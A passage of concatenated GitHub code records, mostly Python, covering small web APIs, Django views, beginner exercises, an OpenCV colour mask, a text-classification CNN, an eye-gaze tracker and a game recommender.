else:\n cursor.execute(\"\"\"insert into favourites(user_id,blog_id)values(%s,%s)\"\"\", [user_id, blog_id])\n mydb.commit()\n add_user_ratings(user_id, blog_id)\n return \"Added to Favourites\"\n\n\n@app.delete('/removefromfavourites/user/{user_id}/blog/{blog_id}')\nasync def remove_blog_from_favourites(user_id: int, blog_id: int):\n cursor.execute(\"\"\" delete from favourites where user_id=%s and blog_id=%s\"\"\", (user_id, blog_id))\n mydb.commit()\n return \"Removed from Favourites\"\n\n# uvicorn app.main:app --reload\n","repo_name":"shahyaksh/Blog-Recommendation-System","sub_path":"BlogAPI/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7586930683","text":"import boto3\nimport json\nimport os\n\ndef lambda_handler(event, context):\n sf = boto3.client('stepfunctions')\n\n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n datas = key.split(\"/\")\n \n datas = {\n \"bucket\": bucket,\n \"key\": key,\n \"size\": record['s3']['object']['size'],\n \"user\": datas[1]\n }\n \n sf.start_execution(\n stateMachineArn=os.environ[\"ARN_IMAGE_PROCESSING\"],\n input=json.dumps(datas)\n )\n","repo_name":"yannistannier/AWS-scripts","sub_path":"lambda/startImageProcessing/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43271061054","text":"# faça um programa que leia 3 números e diga qual é o maior e qual é o menor dentre os 3.\na = int(input('Digite um número: '))\nb = int(input('Digite um número: '))\nc = int(input('Digite um número: '))\nmaior = a\nif b > a and b > c:\n maior = b\nif c > a and c > b:\n maior = c\nprint('O maior dentre os 3 números digitados é o {}.'.format(maior))\n#verificando o menor número dentre os 3.\nmenor = a\nif b < a and b < c:\n menor = b\nif c < a and c < b:\n menor = c\nprint('O meno dentre os 3 números digitados é o {}.'.format(menor))\n","repo_name":"Lucas-Fernandes-Dias/Python-CursoemVideo","sub_path":"Exércicios/100Exercícios/ex033.py","file_name":"ex033.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70508682349","text":"#!/usr/bin/python\n\nimport urllib2\nimport json\nimport sys\nimport os\nimport logging\n\nfrom bs4 import BeautifulSoup\n\nlogging.basicConfig(level='DEBUG')\n\nBASE_URL = \"http://docs.hortonworks.com\"\n\nTARGET_DIR = \"target\"\n\nCURR_DIR = os.path.dirname(os.path.realpath(__file__))\n\nclass Downloader:\n\n def __init__(self, url):\n self.url = url\n logging.info(\"Init URL: [%s]\" % url)\n self.target = CURR_DIR + \"/../\" + TARGET_DIR\n\n def parse(self):\n #html = urllib2.urlopen(self.url, timeout=30).read()\n parsed_html = BeautifulSoup(open(self.url), \"html.parser\") \n content = parsed_html.body.find_all('div', class_=\"title\")\n \n def extract_name(href):\n return href[href.rfind('/') + 1:]\n \n def extract_href(href):\n if href.find('..') > 0:\n ary = href.split(\"/\")\n index = ary.index(\"..\")\n num = 0\n for i in ary:\n if i == \"..\":\n num = num + 1\n del ary[(index - num):(index + num)]\n return '/'.join(ary)\n else:\n return href\n \n for item in content:\n if item:\n link = item.find('a', class_=\"pdf-link\")\n if link:\n href = link['href']\n name = 
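# The maior/menor exercise above finds the largest and smallest of three values
# with chained if-comparisons; Python's built-ins express the same result directly:
a, b, c = 7, 2, 9
maior, menor = max(a, b, c), min(a, b, c)   # 9, 2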
extract_name(href)\n                    yield (name, BASE_URL + extract_href(href))\n    \n    \n    def download(self, item): \n        logging.info(\"Downloading [name=%s, url=%s]\" % item)\n        p = self.target + \"/\" + item[0]\n        with open(p, 'w') as file:\n            logging.info(\"Saving at [%s]\" % p)\n            file.write(urllib2.urlopen(item[1]).read())\n    \n    def main(self):\n        # clear\n        if os.path.exists(self.target) and os.path.isdir(self.target):\n            os.system('rm -rf ' + self.target)\n    \n        os.mkdir(self.target)\n    \n        for item in self.parse():\n            if os.path.isfile(item[0]) > 0 and os.path.getsize(item[0]) > 0: continue\n            self.download(item) \n    \nif __name__ == '__main__':\n\n    if len(sys.argv) != 2:\n        logging.info(\"Please giving url which should download.\") \n        sys.exit(1)\n    \n    downloader = Downloader(sys.argv[1])\n    downloader.main()\n    ","repo_name":"liqingfei/hortonworks-books-spider","sub_path":"src/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20926320667","text":"# -*- coding: utf-8 -*-\nfrom nbautoeval.exercise_function import ExerciseFunction\nfrom nbautoeval.args import Args\n\n\n# @BEG@ name=tri_selection\ndef tri_selection(list):\n    '''la liste list est triée à l'aide de la méthode du tri par sélection'''\n    for i in range(len(list)):\n        mini = i\n        for j in range(i, len(list)):\n            if list[j] < list[mini]:\n                mini = j\n        list[i], list[mini] = list[mini], list[i]\n    return list\n# @END@\n\n\n\ninputs_tri_selection = [\n    Args([1, 10, 3, 5]),\n    Args([10, 2, 8, 1, 0]),\n    Args([5, 1, 3]),\n    Args([15, 10, 14, 12, 8, 21]),\n    \n]\n\n\n\nexo_tri_selection = ExerciseFunction(\n    tri_selection, inputs_tri_selection)\n","repo_name":"misterned/bloc2","sub_path":"corrections/exo_tri_selection.py","file_name":"exo_tri_selection.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19176497027","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nimport json\nfrom models import Customer,product,emp\nfrom serializers import ExSerializer,ExSerializerGet,EmpSerializes\nfrom rest_framework import status\n\n# Create your views here.\nclass customerViwe(APIView):\n\tdef put(self,request):\n\t\treturn Response(\"helll word\")\n\tdef post(self,request):\n\t\tcus=Customer(**request.data)\n\t\tcus.save()\n\t\treturn Response(\" cusert save\")\n\tdef get(self,request):\n\t\tcust=[ i.name for i in Customer.objects.all()]\n\t\treturn Response(cust)\nclass productViwe(APIView):\n\tdef post(self,request):\n\t\ttry:\t\t\n\t\t\tpoduct = ExSerializer(data=request.data)\n\t\t\tif poduct.is_valid():\n\t\t\t\tpoduct.save()\n\t\t\t\treturn Response(\"poduct created successfully\")\n\t\t\telse:\n\t\t\t\treturn Response(poduct._errors,\n\t\t\t\t\tstatus=status.HTTP_400_BAD_REQUEST)\n\t\texcept Exception as err:\n\t\t\treturn Response(err.message,\n\t\t\t\tstatus=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\tdef get(self,request):\n\t\tdata=product.objects.all()\n\t\tpd=ExSerializerGet(data,many=True)\n\t\treturn Response(pd.data)\nclass empView(APIView):\n\tdef put(self,request):\n\t\treturn Response(\"wellcome to emp\")\n\tdef post(self,request):\n\t\tEmp=EmpSerializes(data=request.data)\n\t\tif Emp.is_valid():\n\t\t\tEmp.save()\n\t\t\treturn Response(\"created successfully\")\n\t\telse:\n\t\t\treturn Response(Emp.errors,\n\t\t\t\tstatus=status.HTTP_400_BAD_REQUEST)\n\tdef 
get(self,request):\n\t\tEmp=emp.objects.all()\n\t\tsr=EmpSerializes(Emp,many=True)\n\t\treturn Response(sr.data)\n\n\n\n\n\n","repo_name":"pavankalevaru/DjangoProjects","sub_path":"restfremwork/Apl/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42704517473","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('fttb_list', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='fttb_area',\n options={'verbose_name_plural': '1. FTTB \\u5340\\u57df\\u7bc4\\u570d'},\n ),\n migrations.AlterModelOptions(\n name='fttb_iplist',\n options={'verbose_name_plural': '2. FTTB IP \\u5217\\u8868'},\n ),\n migrations.AlterField(\n model_name='fttb_iplist',\n name='phone_2',\n field=models.CharField(default=b'', max_length=18, verbose_name='\\u806f\\u7d61\\u96fb\\u8a712', blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='historicalfttb_iplist',\n name='phone_2',\n field=models.CharField(default=b'', max_length=18, verbose_name='\\u806f\\u7d61\\u96fb\\u8a712', blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"sufuf3/ipmanage","sub_path":"fttb_list/migrations/0002_auto_20150728_1559.py","file_name":"0002_auto_20150728_1559.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3123128637","text":"'''今日鸽子'''\nimport time\nfrom main import getgroupstorage, memberlist, getname, headshot, getran\n\n\ndef run(_:str):\n date = time.strftime('%y-%m-%d')\n data = getgroupstorage()\n if data.get('jrgz_date')!=date:\n data['jrgz_date'] = date\n member = getran(memberlist())\n data['jrgz'] = member['user_id']\n return f'今日鸽子(1/1)\\n{getname(data[\"jrgz\"])}\\n{headshot(data[\"jrgz\"])}\\n恭喜这位鸽子,今天你可以光明正大的咕咕咕啦!'\n","repo_name":"sch246/yz_bot","sub_path":"_code/bot/cmds/jrgz.py","file_name":"jrgz.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25813641632","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as pl\r\n\r\n\r\ncap = cv2.VideoCapture('images2/video_climb.MOV')\r\n# Создаем цикл, перебираем картинки\r\ncf = 0\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n # В success передаем T или F в зависимости, удалось ли прочитать текущее изображение в видео\r\n\r\n # Уменьшаем шум на фото, но сохраняем контуры\r\n img = cv2.bilateralFilter(img, 30, 35, 45)\r\n\r\n img_HSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\n low_hsv = (130, 20, 20)\r\n up_hsv = (174, 255, 255)\r\n\r\n hsv_mask = cv2.inRange(img_HSV, low_hsv, up_hsv)\r\n\r\n cv2.imshow('Mask', hsv_mask)\r\n cv2.imshow('Image', img)\r\n\r\n # Позволяет проигрывать кадры с нужной скоростью и при необходимости\r\n # выйти из видео с помощью клавиши q\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n\r\n\"\"\"\r\n# Copy the thresholded image.\r\nim_floodfill = hsv_mask.copy()\r\n\r\n# Mask used to flood filling.\r\n# Notice the size needs to be 2 pixels than the image.\r\nh, w = hsv_mask.shape[:2]\r\nmask = np.zeros((h + 2, w + 2), np.uint8)\r\n\r\n# Floodfill from point (0, 0)\r\ncv2.floodFill(im_floodfill, mask, (0, 0), 255)\r\n\r\n# Invert floodfilled image\r\nim_floodfill_inv = 
cv2.bitwise_not(im_floodfill)\r\n\r\n# Combine the two images to get the foreground.\r\nim_out = hsv_mask | im_floodfill_inv\r\n\r\n# Display images.\r\ncv2.imshow(\"Thresholded Image\", hsv_mask)\r\ncv2.imshow(\"Floodfilled Image\", im_floodfill)\r\ncv2.imshow(\"Inverted Floodfilled Image\", im_floodfill_inv)\r\ncv2.imshow(\"Финальный без дырок\", im_out)\r\ncv2.waitKey(0)\r\n\"\"\"\r\n\r\n# cv2.imshow('Window', violet_hsv_mask)\r\n# cv2.waitKey()\r\n","repo_name":"yalokk/climber-s-movements-vision","sub_path":"3.1 Поиск на видео объектов определенного цвета в HSV.py","file_name":"3.1 Поиск на видео объектов определенного цвета в HSV.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18766457705","text":"cedulas = [100,50,20,10,5,2,1]\n\nnumber = int(input())\n\nprint(str(number))\n\naux = number\n\nfor i in range(len(cedulas)):\n\n qtd = int(aux / cedulas[i])\n aux = aux % cedulas[i]\n\n print(f\"{qtd} nota(s) de R$ {cedulas[i]},00\")","repo_name":"thi-martinsj/Programming-Exercises","sub_path":"beecrowd/begginer/1018_banknotes.py","file_name":"1018_banknotes.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9656422941","text":"class Solution:\n def romanToInt(self, s: str) -> int:\n mapping = {\n 'I' : 1,\n 'V' : 5,\n 'X' : 10,\n 'L' : 50,\n 'C' : 100,\n 'D' : 500,\n 'M' : 1000\n }\n exceptionEnd = set(['V', 'X', 'L', 'C', 'D', 'M'])\n exceptionStart = {\n 'I' : {'V': 4, 'X': 9}, \n 'X' : {'L': 40, 'C': 90}, \n 'C' : {'D': 400, 'M': 900}, \n }\n total = 0\n seenException = False\n seenExceptionChar = ''\n for char in s: \n if seenException and char in exceptionEnd:\n total += exceptionStart[seenExceptionChar][char]\n seenException = False\n total -= mapping[seenExceptionChar]\n elif char in exceptionStart: \n seenException = True\n seenExceptionChar = char\n total += mapping[char]\n else:\n total += mapping[char]\n return total\n\n# Runtime: 71 ms, faster than 45.21% of Python3 online submissions for Roman to Integer.\n# Memory Usage: 14 MB, less than 72.57% of Python3 online submissions for Roman to Integer.","repo_name":"cphung3/leetcode-solutions","sub_path":"13. Roman to Integer.py","file_name":"13. 
Roman to Integer.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33805545546","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import layers\nimport process\nimport pandas as pd\n\nlens = 23\n\n\ndef text_cnn_model(cls = 15):\n k = 100 # word embedding\n n = lens # length of a sentence\n inputs = tf.keras.Input(shape=(n, k, 1), name='input_data')\n\n pool_outputs = []\n for filter_size in [4, 5, 6, 7]:\n conv = layers.Conv2D(kernel_size=(filter_size, k), filters=32, activation='relu')(inputs)\n conv = layers.Dropout(0.3)(conv)\n pool = layers.MaxPool2D(pool_size=(n - filter_size + 1, 1))(conv)\n pool_outputs.append(pool)\n\n pool_outputs = layers.concatenate(pool_outputs, axis=-1, name='concatenate')\n pool_outputs = layers.Flatten(data_format='channels_last', name='flatten')(pool_outputs)\n\n outputs = layers.Dense(64, activation='relu')(pool_outputs)\n outputs = layers.Dropout(0.6)(outputs)\n outputs = layers.Dense(cls)(outputs)\n\n model = tf.keras.Model(inputs=inputs, outputs=outputs)\n return model\n\n\ndef main():\n path = './embedding_models/tencent-ailab-embedding-zh-d100-v0.2.0-s/tencent-ailab-embedding-zh-d100-v0.2.0-s.txt'\n\n train_data = pd.read_csv('./data/train.csv')\n dev_data = pd.read_csv('./data/dev.csv')\n\n print(\" == loading word embedding\")\n vectors, size, dim = process.load_embeddings(path)\n vectors['OOV'] = np.random.rand(dim)\n vectors['PAD'] = np.zeros(dim)\n\n print(\"== sentence embedding ==\")\n\n sentences = train_data['sentence'].values.tolist()\n sentences_embedded = [process.vectorize(sentence=sentence, length=lens, padding='PAD', oov='OOV', vectors=vectors)\n for sentence in sentences]\n\n sentences_embedded = np.array(sentences_embedded)\n sentences_embedded = sentences_embedded.reshape(len(train_data), lens, dim, 1)\n\n labels = train_data['label'].values.tolist()\n label_set = set(labels)\n label_map = {}\n for i, key in enumerate(label_set):\n label_map[key] = i\n labels_mapped = np.array([label_map[label] for label in labels])\n \n # load dev data\n dev_sentences = dev_data['sentence'].values.tolist()\n dev_sentences_embedded = [process.vectorize(sentence=sentence, length=lens, padding='PAD', oov='OOV', vectors=vectors)\n for sentence in dev_sentences]\n\n dev_sentences_embedded = np.array(dev_sentences_embedded)\n dev_sentences_embedded = dev_sentences_embedded.reshape(len(dev_data), lens, dim, 1)\n\n dev_labels = dev_data['label'].values.tolist()\n dev_labels_mapped = np.array([label_map[label] for label in dev_labels])\n \n\n model = text_cnn_model()\n model.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n\n print(\"== begin training ==\")\n model.fit(sentences_embedded, labels_mapped,\n validation_data=(dev_sentences_embedded, dev_labels_mapped),\n epochs=30,\n batch_size=256)\n\n print(\"== save model\")\n model.save_weights(\"text_checkpoint\")\n\n #model = text_cnn_model()\n #model.load_weights(\"text_checkpoint\")\n #print(model.summary())\n\n\nif __name__ == '__main__':\n gpus = tf.config.list_physical_devices('GPU')\n if len(gpus)>1:\n tf.config.set_visible_devices(gpus[1], 'GPU')\n print('use gpu1')\n 
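elif gpus:\n        # hedged sketch (an editor addition, not in the original script): with one\n        # visible GPU, enable memory growth so TensorFlow does not reserve the\n        # entire device up front; must run before any op initializes the GPU\n        tf.config.experimental.set_memory_growth(gpus[0], True)\n        print('use gpu0 with memory growth')\n    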
main()\n\n\n","repo_name":"microsoft/atp-edu","sub_path":"Course102/Demos/dl_text_classification/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"26367771027","text":"TYPE_RESIDENTIAL = \"Residential\"\nTYPE_COMMERCIAL = \"Commercial\"\nTYPE_RESIDENTIAL_MULTI = \"Multi-Family\"\n\nSUBTYPE_CONDO = \"Condo\"\nSUBTYPE_LAND = \"Land\"\nSUBTYPE_HOUSE = \"House\"\nSUBTYPE_HOUSE_MULTIFAMILY = \"House-Multi-Family\"\nSUBTYPE_CONDO_MULTIFAMILY = \"Condo-Multi-Family\"\nSUBTYPE_MULTIFAMILY = \"Multi-Family\"\nSUBTYPE_OTHER = \"Other\"\nSUBTYPE_OFFICE = \"Office\"\nSUBTYPE_INDUSTRIAL = \"Industrial\"\nSUBTYPE_RETAIL = \"Retail\"\n\nTYPE_SUBTYPE_MAP = {\n TYPE_RESIDENTIAL: [\n SUBTYPE_HOUSE, SUBTYPE_CONDO,\n SUBTYPE_HOUSE_MULTIFAMILY,\n SUBTYPE_CONDO_MULTIFAMILY\n ],\n TYPE_COMMERCIAL: [\n SUBTYPE_MULTIFAMILY, SUBTYPE_OFFICE, SUBTYPE_LAND,\n SUBTYPE_RETAIL, SUBTYPE_INDUSTRIAL, SUBTYPE_OTHER\n ]\n}\n\nTYPE_CHOICES = [\n (TYPE_RESIDENTIAL, \"Residential\"),\n (TYPE_COMMERCIAL, \"Commercial\")\n]\n\nTYPE_PRICES_MAP = {\n TYPE_RESIDENTIAL: 1000, # in cents\n TYPE_COMMERCIAL: 2000, # in cents\n SUBTYPE_HOUSE_MULTIFAMILY: 2000, # in cents\n SUBTYPE_CONDO_MULTIFAMILY: 2000\n}\n\nSUBTYPE_CHOICES = [\n (SUBTYPE_CONDO, \"Condo\"),\n (SUBTYPE_LAND, \"Land\"),\n (SUBTYPE_HOUSE, \"House\"),\n (SUBTYPE_MULTIFAMILY, \"Multi-Family\"),\n (SUBTYPE_OTHER, \"Other\"),\n (SUBTYPE_OFFICE, \"Office\"),\n (SUBTYPE_INDUSTRIAL, \"Industrial\"),\n (SUBTYPE_RETAIL, \"Retail\"),\n (SUBTYPE_HOUSE_MULTIFAMILY, \"House-Multi-Family\"),\n (SUBTYPE_CONDO_MULTIFAMILY, \"Condo-Multi-Family\")\n]\n\nSTATUS_PENDING = \"pending\"\nSTATUS_UPLOADING = \"uploading\"\nSTATUS_INACTIVE = \"inactive\"\nSTATUS_ACTIVE = \"active\"\nSTATUS_SOLD = \"sold\"\nSTATUS_DELETED = \"deleted\"\n\nSTATUS_CHOICES = [\n (STATUS_PENDING, \"Pending\"),\n (STATUS_INACTIVE, \"Inactive\"),\n (STATUS_ACTIVE, \"Active\"),\n (STATUS_SOLD, \"Sold\"),\n (STATUS_DELETED, \"Deleted\"),\n]\n\nTRANSLATION_TRANSLATED = \"translated\"\nTRANSLATION_OUTDATED = \"outdated\"\nTRANSLATION_SCHEDULED = \"scheduled\"\nTRANSLATION_PROCESSING = \"processing\"\nTRANSLATION_CHOICES = (\n (TRANSLATION_TRANSLATED, \"Translated\"),\n (TRANSLATION_OUTDATED, \"Outdated\"),\n (TRANSLATION_SCHEDULED, \"Scheduled\"),\n (TRANSLATION_PROCESSING, \"Processing\"),\n)\n\n# Translations\nRENT = 'rent'\nTR_FOR_SALE_IN = 'forSaleIn'\nTR_FOR_RENT_IN = 'forRentIn'\nTR_WITH_DASHES = {\n \"multi-family\": \"multiFamily\",\n \"condo-multi-family\": \"condoMultiFamily\",\n \"house-multi-family\": \"houseMultiFamily\",\n}\nTR_DEFAULT_DESCRIPTION = 'defaultDescription'\n\nFILE_STATUS_UPLOADED = 'uploaded'\nFILE_STATUS_ERROR = 'error'\n\nPROPERTIES_FILE_STATUSES = (\n (STATUS_PENDING, 'pending'),\n (STATUS_UPLOADING, 'uploading'),\n (FILE_STATUS_UPLOADED, 'uploaded'),\n (FILE_STATUS_ERROR, 'error')\n)\n\n# Countries lists for advanced search\nMULTI_COUNTRY_NAMES = {\n 'United States': ['USA', 'United States', 'US', 'America'],\n 'Canada': ['Canada'],\n 'United Kingdom': [\n 'United Kingdom', 'UK', 'England', 'Britain', 'Great Britain'\n ],\n 'UAE': ['UAE', 'United Arab Emirates'],\n 'Ireland': ['Ireland'],\n 'New Zealand': ['New Zealand'],\n 'Norway': ['Norwegian', 'Norway'],\n 'Philippines': ['Philippines'],\n 'Israel': ['Israel', 'State of Israel'],\n 'Sweden': ['Sweden'],\n 'Switzerland': ['Switzerland'],\n 'Germany': ['Germany'],\n 'Spain': ['Spain'],\n 'Portugal': 
['Portugal'],\n 'Italy': ['Italy'],\n 'Russia': ['Russia'],\n 'Greece': ['Greece'],\n 'Denmark': ['Denmark'],\n 'Finland': ['Finland'],\n 'Ukraine': ['Ukraine'],\n 'Mexico': ['Mexico'],\n 'Saudi Arabia': ['Saudi Arabia'],\n 'Netherlands': ['Netherlands'],\n 'Luxembourg': ['Luxembourg'],\n 'China': ['China'],\n 'South Africa': ['South Africa'],\n 'Singapore': ['Singapore'],\n 'Belgium': ['Belgium'],\n 'India': ['India'],\n 'Macau': ['Macau', 'Macao'],\n 'Qatar': ['Qatar'],\n 'Taiwan': ['Taiwan'],\n 'Bahrain': ['Bahrain'],\n 'Australia': ['Australia'],\n 'Fiji': ['Fiji'],\n 'France': ['France'],\n}\n","repo_name":"mykolademyanov/portfolio","sub_path":"properties/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2299437097","text":"import argparse\nimport os\n\nimport cv2\nimport face_alignment\nimport numpy as np\nfrom src.EyeGaze import GazeModel\nfrom tqdm import tqdm\n\n\ndef parse_args(args):\n parser = argparse.ArgumentParser(description=\"Choose config: \")\n parser.add_argument(\"--eye_gaze_backbone\", type=str, default=\"mobile_net\")\n parser.add_argument(\n \"--eye_gaze_model_weights\",\n type=str,\n default=\"eye_gaze_tracker/weights/mobile_net_small100_00067.pth\",\n )\n parser.add_argument(\n \"--input_path\", type=str, default=\"eye_gaze_tracker/test/images/\"\n )\n parser.add_argument(\n \"--output_path\", type=str, default=\"eye_gaze_tracker/test/results/\"\n )\n parser.add_argument(\"--device\", type=str, default=\"cpu\")\n return parser.parse_args(args)\n\n\ndef find_gaze(img, gaze_model, landmark, eye_points):\n x_left = int(landmark[eye_points[0]][0])\n x_right = int(landmark[eye_points[3]][0])\n y_top = int(landmark[eye_points[1]][1])\n y_bot = int(landmark[eye_points[5]][1])\n\n x_pad = (x_right - x_left) // 2\n y_pad = (y_top - y_bot) // 2\n\n x_left -= x_pad\n x_right += x_pad\n y_top += y_pad\n y_bot -= y_pad\n\n img = img[y_top:y_bot, x_left:x_right]\n\n if img.size > 0:\n pred = gaze_model.predict(img)\n return pred\n else:\n return [None, None]\n\n\ndef main(args=None):\n print(\"Loading models...\")\n args = parse_args(args)\n for k in vars(args):\n print(f\"{k} : {getattr(args, k)}\")\n\n os.mkdir(args.output_path)\n\n fa = face_alignment.FaceAlignment(\n face_alignment.LandmarksType.TWO_D,\n flip_input=False,\n device=args.device,\n )\n gaze_model = GazeModel(\n args.eye_gaze_backbone, args.eye_gaze_model_weights, args.device\n )\n\n print(\"Processing data...\")\n\n for imname in tqdm(os.listdir(args.input_path)):\n img = cv2.imread(f\"{args.input_path}/{imname}\")\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (256, 256))\n\n landmark = fa.get_landmarks(img)[0]\n\n left_eye_points = [36, 37, 38, 39, 40, 41]\n right_eye_points = [42, 43, 44, 45, 46, 47]\n\n left_gaze = find_gaze(img, gaze_model, landmark, left_eye_points)\n right_gaze = find_gaze(img, gaze_model, landmark, right_eye_points)\n\n gaze = (left_gaze + right_gaze) / 2\n\n left_eye_center = np.mean(landmark[left_eye_points], axis=0)\n right_eye_center = np.mean(landmark[right_eye_points], axis=0)\n\n cv2.arrowedLine(\n img,\n left_eye_center.astype(np.int32),\n (left_eye_center + gaze * 50).astype(np.int32),\n [0, 0, 255],\n 2,\n )\n\n cv2.arrowedLine(\n img,\n right_eye_center.astype(np.int32),\n (right_eye_center + gaze * 50).astype(np.int32),\n [0, 0, 255],\n 2,\n )\n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n 
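# note added in review: cv2.COLOR_BGR2RGB is a pure channel swap, so applying\n        # it a second time converts the RGB working image back to BGR channel\n        # order, which is what cv2.imwrite expects below\n        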
cv2.imwrite(f\"{args.output_path}/{imname}\", img)\n print(f\"Result saved to {args.output_path}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SokolovArtiom/eye_gaze_tracker","sub_path":"eye_gaze_tracker/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11894637442","text":"# content-based recommender system\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\nfrom itertools import chain, repeat\n\nchainer = chain.from_iterable\n\n\n# ---------------------- START functions ----------------------\n# Function that takes in movie title as input and outputs most similar movies\n# def get_recommendations(prod, cosine_sim):\n\n# # Get the pairwise similarity scores of games\n# sim_scores = list(enumerate(cosine_sim[prod]))\n\n# # Sort games based on the similarity scores\n# sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\n# # Get the scores of the 10 most similar games\n# sim_scores = sim_scores[1:11]\n\n# # Get the game indices\n# movie_indices = [i[0] for i in sim_scores]\n\n# # Return the top 10 most similar movies\n# return games_data.iloc[movie_indices]\n\n\ndef create_pivot_table(pd_df):\n data = pd_df.values\n rows, row_pos = np.unique(data[:, 4], return_inverse=True) # col 4: internal user id\n cols, col_pos = np.unique(data[:, 1], return_inverse=True) # col 1: real product id\n pivot_matrix = np.zeros((len(rows), len(cols)), dtype=data.dtype)\n pivot_matrix[:] = np.nan\n pivot_matrix[row_pos, col_pos] = data[:, 2]\n return pivot_matrix\n\n\ndef recommend_movies(pred_df, userID, games, original_ratings, num_recommendations):\n # get internal id of user\n uid_internal = map_uid.at[userID, 'index']\n\n sorted_user_predictions = pred_df.iloc[uid_internal].sort_values(ascending=False)\n\n # get user's rated games\n user_data = original_ratings[original_ratings.user_id == int(userID)]\n\n # optional: merge game info\n # user_full = (user_data.merge(games, how='left', left_on='product_id', right_on='product_id').\n # sort_values(['rating'], ascending=False)\n # )\n\n # Recommend the highest predicted rating games that the user hasn't seen yet.\n recommendations = games_data[~games_data['product_id'].isin(user_data['product_id'])].merge(\n pd.DataFrame(sorted_user_predictions).rename_axis('product_id').reset_index(), how='left',\n on='product_id').rename(columns={uid_internal: 'pred'}).sort_values('pred', ascending=False).iloc[\n :num_recommendations, :]\n\n return recommendations\n\n\n# ---------------------- END functions ----------------------\n\ndata = pd.read_csv(\"/Users/danielkhan/Google Drive/Web Mining Project/Dataset/filter_for_algorithms.csv\",\n usecols=['product_id', 'user_id', 'title_x', 'publisher', 'genres', 'tags', 'specs', 'bin'])\ndata['product_id'] = data['product_id'].astype(int) # product_id is initially a float with .0s\nprint(\"Total users: \" + str(data['user_id'].nunique()))\nprint(\"Total products: \" + str(data['product_id'].nunique()))\n\n# dataframe storing games info\ngames_data = data[['product_id', 'title_x', 'publisher', 'genres']].copy()\ngames_data.fillna(\"\", inplace=True)\ngames_data.drop_duplicates(inplace=True)\ngames_data.set_index(pd.Series(np.arange(len(games_data))), inplace=True)\ngames_data['metadata'] = games_data[['publisher', 'genres']].apply(lambda x: ' '.join(x), 
axis=1)\n\n# produce tfidf matrix\ntfidf = TfidfVectorizer(stop_words='english')\ntfidf_matrix = tfidf.fit_transform(games_data['metadata'])\ntfidf_df = pd.DataFrame(tfidf_matrix.toarray(), index=games_data.index.tolist())\n\n# compute cosine similarity\ncosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n\n# recommendations = get_recommendations(1, cosine_sim)\n# print(recommendations)\n\n# create internal product id\nmap_pid = games_data.reset_index()\nmap_pid = map_pid[['index', 'product_id']].copy()\n\n# create internal user id\nmap_uid = data[['user_id']].copy().drop_duplicates(keep='first')\nmap_uid.set_index(pd.Series(np.arange(len(map_uid))), inplace=True)\nmap_uid.reset_index(inplace=True)\nmap_uid.set_index('user_id', inplace=True)\n\nuser_item = data[['user_id', 'product_id', 'bin']].copy()\nuser_item = user_item.merge(map_pid, on='product_id', how='left')\nuser_item = 